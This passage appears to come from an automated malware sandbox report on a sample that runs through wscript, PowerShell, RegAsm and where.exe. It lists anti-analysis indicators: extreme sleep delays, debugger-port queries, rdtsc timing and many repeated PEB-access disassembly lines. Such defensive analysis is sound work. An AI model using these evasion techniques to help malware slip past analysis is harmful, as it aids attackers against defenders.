        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321BBA0 rdtsc 5_2_0321BBA0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1716
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 793
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3596
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6215
        Source: C:\Windows\SysWOW64\where.exeWindow / User API: threadDelayed 9839
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
        Source: C:\Windows\SysWOW64\where.exeAPI coverage: 3.1 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 3596 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 6215 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep time: -20291418481080494s >= -30000s
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep count: 135 > 30
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep time: -270000s >= -30000s
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep count: 9839 > 30
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep time: -19678000s >= -30000s
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe TID: 6620Thread sleep time: -35000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\SysWOW64\where.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0079C990 FindFirstFileW,FindNextFileW,FindClose,8_2_0079C990
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\where.exe Process queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0321BBA0 rdtsc 5_2_0321BBA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00417D03 LdrLoadDll, 5_2_00417D03
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_032B132D mov eax, dword ptr fs:[00000030h] 5_2_032B132D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F1131 mov eax, dword ptr fs:[00000030h]5_2_031F1131
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov ecx, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A118 mov eax, dword ptr fs:[00000030h]5_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B0115 mov eax, dword ptr fs:[00000030h]5_2_032B0115
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC156 mov eax, dword ptr fs:[00000030h]5_2_031EC156
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F6154 mov eax, dword ptr fs:[00000030h]5_2_031F6154
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F6154 mov eax, dword ptr fs:[00000030h]5_2_031F6154
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7152 mov eax, dword ptr fs:[00000030h]5_2_031F7152
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03289179 mov eax, dword ptr fs:[00000030h]5_2_03289179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9148 mov eax, dword ptr fs:[00000030h]5_2_031E9148
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF172 mov eax, dword ptr fs:[00000030h]5_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov ecx, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03284144 mov eax, dword ptr fs:[00000030h]5_2_03284144
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5152 mov eax, dword ptr fs:[00000030h]5_2_032C5152
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA197 mov eax, dword ptr fs:[00000030h]5_2_031EA197
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A11A4 mov eax, dword ptr fs:[00000030h]5_2_032A11A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320B1B0 mov eax, dword ptr fs:[00000030h]5_2_0320B1B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AC188 mov eax, dword ptr fs:[00000030h]5_2_032AC188
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AC188 mov eax, dword ptr fs:[00000030h]5_2_032AC188
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03230185 mov eax, dword ptr fs:[00000030h]5_2_03230185
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327019F mov eax, dword ptr fs:[00000030h]5_2_0327019F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C61E5 mov eax, dword ptr fs:[00000030h]5_2_032C61E5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032151EF mov eax, dword ptr fs:[00000030h]5_2_032151EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032201F8 mov eax, dword ptr fs:[00000030h]5_2_032201F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C51CB mov eax, dword ptr fs:[00000030h]5_2_032C51CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B61C3 mov eax, dword ptr fs:[00000030h]5_2_032B61C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B61C3 mov eax, dword ptr fs:[00000030h]5_2_032B61C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322D1D0 mov eax, dword ptr fs:[00000030h]5_2_0322D1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0322D1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F51ED mov eax, dword ptr fs:[00000030h]5_2_031F51ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B903E mov eax, dword ptr fs:[00000030h]5_2_032B903E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E016 mov eax, dword ptr fs:[00000030h]5_2_0320E016
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA020 mov eax, dword ptr fs:[00000030h]5_2_031EA020
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC020 mov eax, dword ptr fs:[00000030h]5_2_031EC020
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5060 mov eax, dword ptr fs:[00000030h]5_2_032C5060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F2050 mov eax, dword ptr fs:[00000030h]5_2_031F2050
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov ecx, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201070 mov eax, dword ptr fs:[00000030h]5_2_03201070
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321C073 mov eax, dword ptr fs:[00000030h]5_2_0321C073
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B052 mov eax, dword ptr fs:[00000030h]5_2_0321B052
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329705E mov ebx, dword ptr fs:[00000030h]5_2_0329705E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329705E mov eax, dword ptr fs:[00000030h]5_2_0329705E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F5096 mov eax, dword ptr fs:[00000030h]5_2_031F5096
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED08D mov eax, dword ptr fs:[00000030h]5_2_031ED08D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B60B8 mov eax, dword ptr fs:[00000030h]5_2_032B60B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B60B8 mov ecx, dword ptr fs:[00000030h]5_2_032B60B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F208A mov eax, dword ptr fs:[00000030h]5_2_031F208A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D090 mov eax, dword ptr fs:[00000030h]5_2_0321D090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D090 mov eax, dword ptr fs:[00000030h]5_2_0321D090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322909C mov eax, dword ptr fs:[00000030h]5_2_0322909C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032150E4 mov eax, dword ptr fs:[00000030h]5_2_032150E4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032150E4 mov ecx, dword ptr fs:[00000030h]5_2_032150E4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032320F0 mov ecx, dword ptr fs:[00000030h]5_2_032320F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov ecx, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C0 mov eax, dword ptr fs:[00000030h]5_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC0F0 mov eax, dword ptr fs:[00000030h]5_2_031EC0F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C50D9 mov eax, dword ptr fs:[00000030h]5_2_032C50D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F80E9 mov eax, dword ptr fs:[00000030h]5_2_031F80E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032720DE mov eax, dword ptr fs:[00000030h]5_2_032720DE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032190DB mov eax, dword ptr fs:[00000030h]5_2_032190DB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EA0E3 mov ecx, dword ptr fs:[00000030h]5_2_031EA0E3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320F720 mov eax, dword ptr fs:[00000030h]5_2_0320F720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B972B mov eax, dword ptr fs:[00000030h]5_2_032B972B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C720 mov eax, dword ptr fs:[00000030h]5_2_0322C720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C720 mov eax, dword ptr fs:[00000030h]5_2_0322C720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF72E mov eax, dword ptr fs:[00000030h]5_2_032AF72E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F0710 mov eax, dword ptr fs:[00000030h]5_2_031F0710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB73C mov eax, dword ptr fs:[00000030h]5_2_032CB73C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326C730 mov eax, dword ptr fs:[00000030h]5_2_0326C730
